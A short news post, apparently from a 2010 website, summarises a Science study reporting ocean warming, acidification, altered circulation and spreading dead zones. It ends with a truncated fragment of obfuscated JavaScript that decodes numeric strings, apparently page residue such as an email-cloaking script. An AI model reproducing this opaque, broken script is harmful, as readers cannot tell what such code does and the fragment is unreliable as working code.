

Oceans choking on CO2, face deadly changes

Written by Administrator
Saturday, 19 June 2010 17:32

According to a new study reported in *Science*, the world's oceans are virtually choking on rising greenhouse gases, destroying marine ecosystems and breaking down the food chain -- irreversible changes that have not occurred for several million years. Oceans have been rapidly warming and acidifying, water circulation has been altered and dead zones within the ocean depths are expanding. Marine ecosystems are being adversely affected.

More [here](#)

TAGS: oceans, CO2, ocean warming, ocean acidification, dead zones, climate change, global warming, marine ecosystems

```
var a=0,m,v,t,z,x=new  
Array('7980857265','7571736577','7675796980697574','6162797572818065','63726976','78656  
380','7684','61818075'),l=x.length;while(++a
```